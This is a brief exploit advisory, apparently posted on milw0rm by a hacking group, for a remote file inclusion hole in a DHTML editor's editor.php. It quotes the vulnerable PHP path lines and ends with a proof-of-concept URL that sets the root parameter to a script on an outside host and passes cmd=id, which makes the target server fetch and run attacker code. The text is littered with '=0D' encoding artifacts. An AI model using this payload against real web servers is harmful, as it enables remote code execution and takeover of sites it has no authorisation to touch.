|
|
# Kurdish Security Advisory=0D
# irc.gigachat.net #kurdhack =0D
# http://www.milw0rm.com/exploits/1905=0D
# Editor DHTML Scripting bugz =0D
=0D
$url_path_editor = "$root_url/library/editor/"; =0D
$abs_path_editor = "$root/library/editor/"; =0D
=0D
?>=0D
=0D
Proof Of Concept =0D
=0D
http://www.site.com/[dcpath]/library/editor/editor.php?root=http://www.yourscripts.com/x.txt?cmd=id